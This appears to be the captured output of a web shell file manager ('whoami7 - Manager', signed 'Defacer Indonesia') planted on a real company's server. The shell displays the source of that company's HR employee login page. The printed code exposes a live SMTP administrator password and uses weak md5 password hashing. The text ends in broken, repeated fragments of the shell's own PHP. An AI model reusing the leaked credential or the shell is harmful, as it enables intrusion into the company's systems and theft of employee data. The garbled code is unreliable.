whoami7 - Manager

: /home/gracious/hris.graciousphils.com/backup hris employee/ Upload File: files >> /home/gracious/hris.graciousphils.com/backup hris employee/index.php <?php session_start(); include('includes/config.php'); ?> <!DOCTYPE html> <html lang="en"> <head> <!-- Title --> <!--<title>ELMS | Home Page</title>--> <title>Human Resources Information System</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="includes/assets/bootstrap.min.css"> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script> <script type="text/javascript" src="scripts.js"></script> <link rel="stylesheet" type="text/css" href="styles.css"> <Style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700;800;900&display=swap'); * { margin: 0; padding: 0; box-sizing: border-box; font-family: 'Poppins', sans-serif } body { background: #ecf0f3 } .wrapper { max-width: 350px; min-height: 500px; margin: 80px auto; padding: 40px 30px 30px 30px; background-color: #ecf0f3; border-radius: 15px; box-shadow: 05px 05px 20px #cbced1, -05px -05px 20px #cbced1 } .logo { width: 100%; margin: auto } .logo img { width: 100%; height: 80px; object-fit: cover; border-radius: 50%; box-shadow: 0px 0px 3px #5f5f5f, 0px 0px 0px 5px #ecf0f3, 8px 8px 15px #a7aaa7, -8px -8px 15px #fff } .wrapper .name { font-weight: 600; font-size: 1.4rem; letter-spacing: 1.3px; padding-left: 10px; color: #555 } .wrapper .form-field input { width: 100%; display: block; border: none; outline: none; background: none; font-size: 1.2rem; color: #666; padding: 10px 15px 10px 10px } .wrapper .form-field { padding-left: 10px; margin-bottom: 20px; border-radius: 20px; box-shadow: inset 8px 8px 8px #cbced1, inset -8px -8px 8px #fff } .wrapper .form-field .fas { color: #555 } .wrapper .btn { box-shadow: none; width: 100%; height: 40px; background-color: #03A9F4; color: #fff; border-radius: 25px; box-shadow: 3px 3px 3px #b1b1b1, -3px -3px 3px #fff; letter-spacing: 1.3px } .wrapper .btn:hover { background-color: #039BE5 } .wrapper a { text-decoration: none; font-size: 0.8rem; color: #03A9F4 } .wrapper a:hover { color: #039BE5 } @media(max-width: 380px) { .wrapper { margin: 30px 20px; padding: 40px 15px 15px 15px } } </Style> <!-- Theme Styles --> <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="http://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script> <script src="http://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> <script type="text/javascript"> window.history.forward(); function noBack() { window.history.forward(); } </script> </head> <body> <?php use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; use PHPMailer\PHPMailer\Exception; if (isset($_POST['editpass'])) { $empcode = htmlspecialchars($_POST['empcode'], ENT_QUOTES,'UTF-8'); $emailcode = htmlspecialchars($_POST['emailcode'], ENT_QUOTES,'UTF-8'); $mess = "<a href='hris.graciousphils.com/otp.php?ecd=" . $empcode . "'>hris.graciousphils.com/otp.php?ecd=" . $empcode . "</a>"; $sql = "SELECT * FROM tblemployees where EmailId = :emailcode and EmpId = :empcode"; $query = $dbh -> prepare($sql); $query->bindParam(':empcode',$empcode,PDO::PARAM_STR); $query->bindParam(':emailcode',$emailcode,PDO::PARAM_STR); $query->execute(); if($query->rowCount() > 0) { require 'class/src/Exception.php'; require 'class/src/PHPMailer.php'; require 'class/src/SMTP.php'; $mail = new PHPMailer(true); $mail->isSMTP(); // Set mailer to use SMTP $mail->Host = 'mail.graciousphils.com'; // Specify main and backup SMTP servers $mail->SMTPAuth = true; // Enable SMTP authentication $mail->Username = 'administrator@graciousphils.com'; // SMTP username $mail->Password = 'GGLPC@dmin1128'; // SMTP password $mail->SMTPSecure = 'ssl'; // Enable TLS encryption, `ssl` also accepted $mail->Port = 465; // TCP port to connect to $mail->setFrom('administrator@graciousphils.com', 'Change Password Form'); $mail->addAddress($_POST['emailcode']); // Add a recipient $mail->addReplyTo('administrator@graciousphils.com'); $mail->isHTML(true); // Set email format to HTML $mail->Subject = $_POST['subject']; $NineDigitRandomNumber = (mt_rand(10000,99999)); $mail->Body = "<strong>$NineDigitRandomNumber</strong>" . " " . 'is your authentication code. For your protection please do not share this code to anyone' . ", " . "<br>" . " Click this link to change your password or copy and paste it on your browser" . " " . $mess; if(!$mail->send()) { echo "<div class='alert alert-dismissible alert-info'> <button type='button' class='btn-close' data-bs-dismiss='alert'></button> <strong>Message could not be sent.</strong> </div>" . " " . 'Mailer Error: ' . $mail->ErrorInfo; } else { echo "<div class='alert alert-dismissible alert-info'> <button type='button' class='btn-close' data-bs-dismiss='alert'></button> Message and link successfully sent to your <strong>Email</strong>, please check. </div>"; $sql = "INSERT INTO tblotp (col_otp,is_used) values (:NineDigitRandomNumber, '0')"; $query = $dbh->prepare($sql); $query->bindParam(':NineDigitRandomNumber',$NineDigitRandomNumber,PDO::PARAM_STR); $query->execute(); } }else{ echo "<div class='alert alert-dismissible alert-info'> <button type='button' class='btn-close' data-bs-dismiss='alert'></button> <strong>Biocode or Email</strong> you enter is not on the list. </div>"; } } ?> <?php try { if(isset($_POST['signin'])) { $uname=htmlspecialchars($_POST['username'], ENT_QUOTES,'UTF-8'); $password=htmlspecialchars(md5($_POST['password']), ENT_QUOTES,'UTF-8'); $sql ="SELECT * FROM tblemployees WHERE EmailId=:uname and PW=:password"; $query= $dbh -> prepare($sql); $query-> bindParam(':uname', $uname, PDO::PARAM_STR); $query-> bindParam(':password', $password, PDO::PARAM_STR); $query-> execute(); $results=$query->fetchAll(PDO::FETCH_OBJ); if($query->rowCount() > 0) { foreach ($results as $result) { $status=$result->Status; $_SESSION['eid']=$result->id; $_SESSION['empid']=$result->EmpId; $_SESSION['dept']=$result->Department; $_SESSION['fname']=$result->FirstName; $_SESSION['mname']=$result->MiddleName; $_SESSION['lname']=$result->LastName; $_SESSION['email']=$result->EmailId; $_SESSION['ecomp']=$result->Company; $_SESSION['ext']=$result->Suffix; $_SESSION['emppos']=$result->Position; $_SESSION['nick']=$result->NickName; $_SESSION['gender']=$result->Gender; $_SESSION['poslvl']=$result->Position_Level; $_SESSION['area']=$result->Company_Area; } if($status==0) { echo "<div class='alert alert-dismissible alert-info'> <button type='button' class='btn-close' data-bs-dismiss='alert'></button> <strong>Your account is Inactive. Please contact admin;</strong> </div>"; } else { $_SESSION['emplogin']=$_POST['username']; echo "<div class='alert alert-dismissible alert-info'> <button type='button' class='btn-close' data-bs-dismiss='alert'></button> </div>"; echo "<script type='text/javascript'> document.location = 'bulletinboard.php'; </script>"; } } else { echo "<div class='alert alert-dismissible alert-info'> <button type='button' class='btn-close' data-bs-dismiss='alert'></button> <strong>Invalid Details</strong> please try again. </div>"; } } } catch (PDOException $e) { echo"". $e->getMessage(); } ?> <?php if (isset($_POST['proceed'])) { $fname = htmlspecialchars($_POST['fname'], ENT_QUOTES,'UTF-8'); $mname = htmlspecialchars($_POST['mname'], ENT_QUOTES,'UTF-8'); $lname = htmlspecialchars($_POST['lname'], ENT_QUOTES,'UTF-8'); $emailid = htmlspecialchars($_POST['emailid'], ENT_QUOTES,'UTF-8'); $sql = "SELECT * FROM tblemployees where EmailId = :emailid"; $query = $dbh -> prepare($sql); $query->bindParam(':emailid',$emailid,PDO::PARAM_STR); $query->execute(); if($query->rowCount() > 0) { echo "<div class='alert alert-dismissible alert-warning'> <button type='button' class='btn-close' data-bs-dismiss='alert'></button> <strong>Email is already on the list you must be using someone's Email.</strong> </div>"; } else { $fname = htmlspecialchars($_POST['fname'], ENT_QUOTES,'UTF-8'); $mname = htmlspecialchars($_POST['mname'], ENT_QUOTES,'UTF-8'); $lname = htmlspecialchars($_POST['lname'], ENT_QUOTES,'UTF-8'); $sql = "SELECT * FROM tblemployees where FirstName = :fname and MiddleName = :mname and LastName = :lname"; $query = $dbh -> prepare($sql); $query->bindParam(':fname',$fname,PDO::PARAM_STR); $query->bindParam(':mname',$mname,PDO::PARAM_STR); $query->bindParam(':lname',$lname,PDO::PARAM_STR); $query->execute(); if($query->rowCount() > 0) { echo "<div class='alert alert-dismissible alert-warning'> <button type='button' class='btn-close' data-bs-dismiss='alert'></button> <strong>Employee Name is already on the list you must be using someone's name.</strong> </div>"; } else { $verifier = (mt_rand(100000,999999)); $isused = 0; $ver = 0; $sql = "INSERT INTO tbl_verifier (Emp_Name,Emp_Mname,Emp_Lname,Emp_Email,Emp_Otp, is_used, verified) values (:fname, :mname, :lname, :emailid, :verifier, :isused, :ver)"; $query = $dbh -> prepare($sql); $query->bindParam(':fname',$fname,PDO::PARAM_STR); $query->bindParam(':mname',$mname,PDO::PARAM_STR); $query->bindParam(':lname',$lname,PDO::PARAM_STR); $query->bindParam(':emailid',$emailid,PDO::PARAM_STR); $query->bindParam(':verifier',$verifier,PDO::PARAM_STR); $query->bindParam(':isused',$isused,PDO::PARAM_STR); $query->bindParam(':ver',$ver,PDO::PARAM_STR); $query->execute(); if($query->rowCount() > 0) { echo "<div class='alert alert-dismissible alert-success'> <button type='button' class='btn-close' data-bs-dismiss='alert'></button> <strong>Request Successfull Submitted.</strong><a href='verifier.php'> Click HERE! To Continue Registration</a> </div>"; } else { echo "<div class='alert alert-dismissible alert-success'> <button type='button' class='btn-close' data-bs-dismiss='alert'></button> <strong>Failed to submit request.</strong> </div>"; } } } } ?> <div class="wrapper"> <div class="logo"> <div class="text-center mt-4 name"> Employee Login </div> <form class="p-3 mt-3" name="signin" method="post"> <div class="form-field d-flex align-items-center" > <span class="far fa-user"></span> <input id="username" type="text" name="username" class="validate" placeholder="Email Address"> </div> <div class="form-field d-flex align-items-center"> <span class="fas fa-key"></span> <input id="password" type="password" class="validate" name="password" placeholder="Password"> </div> <div class="text-center fs-6"> <a data-bs-toggle="modal" data-bs-target="#staticBackdrop">Create an Account</a> </div> <div class="text-center fs-6"> <a data-bs-toggle="modal" data-bs-target="#forgotpass">Forgot Password</a> </div> <input id="position" type="hidden" name="position" class="validate" value="Staff"> <input type="submit" name="signin" value="Sign in" class="btn mt-3"> </form> </div> </div> <div class="modal fade" id="staticBackdrop" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="staticBackdropLabel" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content"> <form method="POST"> <div class="modal-header bg-primary"> <h5 class="modal-title text-white" id="staticBackdropLabel">Create an Account</h5> <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button> </div> <div class="modal-body"> <div class="card"> <div class="card-body"> <div class="form-group"> <label class="col-form-label mt-2 " for="inputDefault">First Name</label> <input type="text" class="form-control" placeholder="Your Name Here" id="fname" name="fname" required autocomplete="off" oninput="this.value = this.value.replace(/[^A-z,.''. \u00d1 \u00f1]/g, '').replace(/(..*)\./g, '$1');"> </div> <div class="form-group"> <label class="col-form-label mt-2 " for="inputDefault">Middle Name(Optional)</label> <input type="text" class="form-control" placeholder="Your Middle Name Here" id="mname" name="mname"autocomplete="off" oninput="this.value = this.value.replace(/[^A-z,.''. \u00d1 \u00f1]/g, '').replace(/(..*)\./g, '$1');"> </div> <div class="form-group"> <label class="col-form-label mt-2 " for="inputDefault">Last Name</label> <input type="text" class="form-control" placeholder="Your Last Name Here" id="lname" name="lname" required autocomplete="off" oninput="this.value = this.value.replace(/[^A-z,.''. \u00d1 \u00f1]/g, '').replace(/(..*)\./g, '$1');"> </div> <div class="form-group"> <label class="col-form-label mt-2 " for="inputDefault">Email</label> <input type="email" class="form-control" placeholder="Your Email Here" id="emailid" name="emailid" required autocomplete="off"> </div> <div class="form-group mt-2"> <input class="form-check-input bg-dark" type="checkbox" id="checkboxNoLabel" value="" aria-label="..." required> By filling out and submitting this form, I allow Human Resources Department to collect, process, store and access my personal information in compliance with the Data Privacy Act of 2012. I hereby certify that all entries are true and correct. <a href="dataprivacy/privacyact.pdf" target="_BLANK">View Data Privacy Act</a> </div> </div> </div> </div> <div class="modal-footer bg-primary"> <button type="button" class="btn btn-danger" data-bs-dismiss="modal">Close</button> <button type="submit" class="btn btn-primary border-white" id="proceed" name="proceed">Proceed</button> </div> </form> </div> </div> </div> <div class="modal fade" id="forgotpass" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="staticBackdropLabel" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content"> <form method="POST"> <div class="modal-header bg-primary text-white"> <h5 class="modal-title" id="staticBackdropLabel">Forgot Password</h5> <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button> </div> <div class="modal-body"> <div class="form-group"> <label class="form-label">Please fill the needed information</label> <div class="form-floating"> <input type="text" class="form-control" id="empcode" name="empcode" placeholder="Bio Code" autocomplete="off" required maxlength="11"> <label for="empcode" class="text-dark">Employee Biocode</label> </div> <div class="form-floating mb-3 mt-2"> <input type="email" class="form-control" id="emailcode" name="emailcode" placeholder="name@example.com" autocomplete="off" required> <label for="emilid" class="text-dark" oninput="this.value = this.value.replace(/[^A-z,.''. @,0-9\u00d1 \u00f1]/g, '').replace(/(..*)\./g, '$1');">Email address</label> </div> <div class="row"> <div class="col-md-12 form-group"> <input type="hidden" class="form-control" id="subject" class="form-control" name="subject" value="Forgot Password Form" maxlength="50"> </div> </div> </div> </div> <div class="modal-footer bg-primary"> <button type="button" class="btn btn-danger" data-bs-dismiss="modal">Close</button> <button type="submit" class="btn btn-primary border-white" id="editpass" name="editpass">Submit</button> </div> </form> </div> </div> </div> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script> <script type="text/javascript"> document.onkeydown = function(e) { if(event.keyCode == 123) { return false; } if(e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)){ return false; } if(e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)){ return false; } if(e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)){ return false; } if(e.ctrlKey && e.keyCode == 'C'.charCodeAt(0)){ return false; } if(e.ctrlKey && e.keyCode == 'X'.charCodeAt(0)){ return false; } if(e.ctrlKey && e.keyCode == 'Y'.charCodeAt(0)){ return false; } if(e.ctrlKey && e.keyCode == 'Z'.charCodeAt(0)){ return false; } if(e.ctrlKey && e.keyCode == 'V'.charCodeAt(0)){ return false; } if (e.keyCode == 67 && e.shiftKey && (e.ctrlKey || e.metaKey)){ return false; } if (e.keyCode == 'J'.charCodeAt(0) && e.altKey && (e.ctrlKey || e.metaKey)){ return false; } if (e.keyCode == 'I'.charCodeAt(0) && e.altKey && (e.ctrlKey || e.metaKey)){ return false; } if ((e.keyCode == 'V'.charCodeAt(0) && e.metaKey) || (e.metaKey && e.altKey)){ return false; } if (e.ctrlKey && e.shiftKey && e.keyCode == 'C'.charCodeAt(0)){ return false; } if(e.ctrlKey && e.keyCode == 'S'.charCodeAt(0)){ return false; } if(e.ctrlKey && e.keyCode == 'H'.charCodeAt(0)){ return false; } if(e.ctrlKey && e.keyCode == 'A'.charCodeAt(0)){ return false; } if(e.ctrlKey && e.keyCode == 'F'.charCodeAt(0)){ return false; } if(e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)){ return false; } } if (document.addEventListener) { document.addEventListener('contextmenu', function(e) { e.preventDefault(); }, false); }else{ document.attachEvent('oncontextmenu', function() { window.event.returnValue = false; }); } </script> </body> </html> Copyright ©2021 || Defacer Indonesia nfo .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> ?> & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> ?> )); return $info; } ?> ?>